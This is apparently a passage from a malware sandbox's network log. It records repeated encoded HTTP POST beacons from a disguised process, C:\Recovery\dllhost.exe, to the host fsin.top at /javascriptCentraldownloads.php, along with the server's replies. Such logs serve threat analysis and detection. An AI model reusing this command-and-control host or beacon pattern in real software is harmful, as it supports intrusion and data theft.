                                                  Data Ascii: TW]QZYXP\^ZQTQW[WR^XV[QX[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"X0!5]6'#^(+>R)>\&84'/23(U,-$641&G#.X!
                                                  Aug 1, 2024 07:39:02.670185089 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:02.909406900 CEST731INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:02 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AsQCQvt10Nnwjhnv9uCYdpleJeHg7OsMXPZZHIYxi%2F93rQA6vxf5ufFb40zwjBSh2nlkaNVkf43m0bLJlmOVkQdNIUoQ%2F1SMsMw2GXAFOhgYweCjWCY1H79WeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c455c5642c1-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 22 51 27 2b 3a 1d 35 3a 0a 55 29 54 29 57 3d 0a 20 14 28 29 23 1b 26 2f 39 5e 32 28 34 1c 21 05 2d 58 30 11 21 0d 32 21 32 5b 2a 27 21 51 04 11 25 02 23 1d 26 5e 29 00 27 5c 33 38 01 5b 23 36 28 1f 24 1d 29 57 20 2a 28 59 29 31 39 13 2b 1c 20 0b 2d 2b 3f 1a 2b 55 2c 10 27 26 2a 56 0d 17 21 0d 2d 2b 27 0f 30 54 38 55 34 3c 0d 11 20 38 21 58 29 3f 00 5c 29 24 07 06 39 23 24 03 3e 0a 2d 09 2a 2d 29 12 3e 2a 2d 1b 24 39 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98"Q'+:5:U)T)W= ()#&/9^2(4!-X0!2!2[*'!Q%#&^)'\38[#6($)W *(Y)19+ -+?+U,'&*V!-+'0T8U4< 8!X)?\)$9#$>-*-)>*-$9"],-H=YM0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  135192.168.2.449872172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:02.315205097 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:02.662374020 CEST1012OUTData Raw: 54 56 58 55 5f 5f 58 53 5c 5e 5a 51 54 5f 57 56 57 57 5e 59 56 54 51 5d 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TVXU__XS\^ZQT_WVWW^YVTQ][]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"[3=#=<0,(+)>&*1; %>%#V83]5 2%&G#.X!
                                                  Aug 1, 2024 07:39:02.769439936 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:02.921621084 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:02 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CzaZ3NGXa1pSFS5qArrN%2Fntlq%2BBomGF6P82QaMcjFA%2Fpk85Rmznw0nQBZBvUUykrrSIIA%2B77ZR2SeVfrepaXYQGtnXhw7Qtw0BEND2yytUNVy8dtO8WG8J22jg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c460c5642e5-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  136192.168.2.449873172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:03.241097927 CEST250OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:39:03.600594997 CEST1012OUTData Raw: 51 55 58 5c 5a 5c 5d 53 5c 5e 5a 51 54 54 57 50 57 51 5e 5e 56 5c 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QUX\Z\]S\^ZQTTWPWQ^^V\QT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"^0)^!8Z'S<)(*T?5Y28&Y)&3S--$!7&&G#.X!,
                                                  Aug 1, 2024 07:39:03.684453964 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:03.936506033 CEST588INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:03 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JfxerWqZzHsHv6ERI%2FjRjCxfddQXuSZ5jOaAojmhtaucukhJgAjcTGDFaKorCZnieyESuugKBM8JDWRT3BnKXrRcJocsKhlup%2B%2FtaMhq%2BlhRLFSxa4fuIWw4%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c4bcfa87cf6-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  137192.168.2.449874172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:04.054843903 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:04.412863970 CEST1012OUTData Raw: 51 53 58 56 5a 5c 58 57 5c 5e 5a 51 54 51 57 5b 57 5e 5e 56 56 5d 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QSXVZ\XW\^ZQTQW[W^^VV]Q\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Y%2_!70;?8>S*%!&;4&>13#/='^6/Y&5&G#.X!
                                                  Aug 1, 2024 07:39:04.521378994 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:04.771128893 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:04 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sp2cZcz3MHF%2FLNqXQ2TaruBqOdwaQm1aX0Q9l99UQBl6nftWZjlUvqsjQrvW5Pui3Pu18EiKWP0Cwzg2%2BkNr8Ij4O6L6n3awC%2B4V%2BYUM3WXZo1fihxnp6DCMHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c50fadd176c-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  138192.168.2.449875172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:04.897499084 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:05.256345034 CEST1008OUTData Raw: 54 55 5d 55 5f 58 58 56 5c 5e 5a 51 54 56 57 57 57 51 5e 58 56 5e 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TU]U_XXV\^ZQTVWWWQ^XV^Q[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Z$29#=4$;Y(T)%^2(S%*[10(R/.!;;15&G#.X!4
                                                  Aug 1, 2024 07:39:05.371817112 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:05.611660004 CEST590INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:05 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9sLPAIF2WASuiGcLJ%2FnJMOvE%2BDRCmKtnIxbkR4wJMf0MNR4SDBEgSUHJ9qXqMGzAAgxAw%2BW9GL3XfO8EwTDj3OKLByd0FvVoDIsy%2FAdy%2Bhkk3d6LwTpC%2Bz8xUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c564e3872b9-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  139192.168.2.449876172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:05.743427038 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:06.099889040 CEST1008OUTData Raw: 51 57 58 53 5f 5d 5d 51 5c 5e 5a 51 54 56 57 55 57 55 5e 57 56 54 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QWXS_]]Q\^ZQTVWUWU^WVTQ\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"^%2Z!.70S;+&*"^%+;%%(W/=;6('^%&G#.X!<
                                                  Aug 1, 2024 07:39:06.190793037 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:06.415210009 CEST588INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:06 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OKIzHg9mbDOa%2FtawYCsg1M48%2B0l48XcQ9JZubUi%2Fb6YXorZr0bepP%2BKKPAF6XP%2FGOGHJjujpNeQZ9fc0OcXU1PhFqNoeDJNJeb2b8fGXnekjuwHuwpDAXxgyVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c5b6941440d-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  140192.168.2.449877172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:06.549582958 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:06.896562099 CEST1012OUTData Raw: 54 51 58 50 5a 5b 58 5c 5c 5e 5a 51 54 55 57 50 57 50 5e 56 56 54 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TQXPZ[X\\^ZQTUWPWP^VVTQ_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!3*!&%(?"*%++Q1Y2Z2U;/\67^%&G#.X!(
                                                  Aug 1, 2024 07:39:07.006580114 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:07.256700039 CEST582INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:07 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C7evcqh8sODgMSZ4nkNsp5Sn6pTEqRsA91zkG4b8p6PdePbRbdYkxQUWeB%2F3yPJaLXk%2FYVcQPmKcfPVDzRcJAR1oGAxxNtpWVp01gNslBEt2QiyWMalflw7aRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c6088258c78-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  141192.168.2.449878172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:07.511245966 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:07.886281013 CEST1012OUTData Raw: 54 5e 58 51 5f 5a 58 5d 5c 5e 5a 51 54 53 57 51 57 55 5e 56 56 5a 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T^XQ_ZX]\^ZQTSWQWU^VVZQ[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"$2!!=<X$ (]->&"&^8&/)1 8='^5;;]&%&G#.X!0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  142192.168.2.449879172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:07.945930004 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1252
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:08.302906036 CEST1252OUTData Raw: 54 5e 58 53 5f 5d 58 53 5c 5e 5a 51 54 56 57 51 57 5f 5e 5e 56 5a 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T^XS_]XS\^ZQTVWQW_^^VZQT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'!#-80,)+.R>6>&8&<>Y%#/>'6#1&G#.X!,
                                                  Aug 1, 2024 07:39:08.400645971 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:08.571106911 CEST737INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:08 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HUD7VqLB5aMfyf9Qsk4YRYcob85q%2FasVdt9hGNCgZ6Uv801893lfAbEN2IdrzBNfjwcHeba%2BiG%2BUcQXIgRm5TGNlYs%2BYM5wt7FD8X%2F3NiKbOUGz2alvakoHUxg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c693e28426b-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 22 1e 27 01 39 0f 20 39 33 0a 28 22 31 50 2b 30 24 5c 2a 3a 3b 5f 31 12 39 58 31 01 3c 52 21 05 31 58 27 59 2a 1d 31 1c 0c 5f 29 1d 21 51 04 11 26 5f 20 1d 21 04 29 07 34 01 30 38 28 01 23 25 3f 02 27 20 35 1c 22 17 16 16 2a 21 21 58 2b 0c 0e 0f 3a 2b 34 06 2b 33 24 5b 31 36 2a 56 0d 17 22 50 2d 16 23 09 26 21 2f 0d 22 3f 3f 53 21 2b 03 13 3e 01 22 5a 2a 24 3e 12 2d 33 0d 5f 3d 0d 3e 52 2b 2d 3d 13 3f 14 0f 19 33 39 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98"'9 93("1P+0$\*:;_19X1<R!1X'Y*1_)!Q&_ !)408(#%?' 5"*!!X+:+4+3$[16*V"P-#&!/"??S!+>"Z*$>-3_=>R+-=?39"],-H=YM0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  143192.168.2.449880172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:08.229049921 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:08.584150076 CEST1012OUTData Raw: 54 51 5d 55 5f 5e 5d 51 5c 5e 5a 51 54 51 57 54 57 51 5e 5d 56 5d 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TQ]U_^]Q\^ZQTQWTWQ^]V]Q_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"_$165Y'6/++&S)%-%;$&,6^$33/ !?^%&G#.X!
                                                  Aug 1, 2024 07:39:08.682543993 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:08.841764927 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:08 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vAdV4awD9AFspupzzY2Ml7c9yUMP4eg5Hg9fZYXlXdwzn8%2BxPjwbZiKEd046Kj2P%2FYYNaYUtBku0Efx%2Fuw9h8hjtgD70re1bwSQDtLt59L%2BQgWevLLENo842Lw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c6afd931a1b-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  144192.168.2.449881172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:08.960954905 CEST250OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:39:09.318627119 CEST1008OUTData Raw: 54 57 58 54 5a 5a 58 53 5c 5e 5a 51 54 56 57 51 57 52 5e 5e 56 5c 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TWXTZZXS\^ZQTVWQWR^^V\Q\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!$"+$%;X<()>-%+;V2?23/+_6+;]2&G#.X!,
                                                  Aug 1, 2024 07:39:09.406914949 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:09.648047924 CEST592INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:09 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dTe%2BhQTXeV0K1JF4JM5X6EtpY0vd3Y%2BP3HKdDvIb7JUCCSkCdillVd3w%2B4lhqD5p48BM%2BDgJRPLT%2F%2Bt0XtoNV9EapfZVSY2%2Fgu7wyhWO9LbsblGfQJrqgMbXTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c6f8a7c43c1-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  145192.168.2.449882172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:09.775793076 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
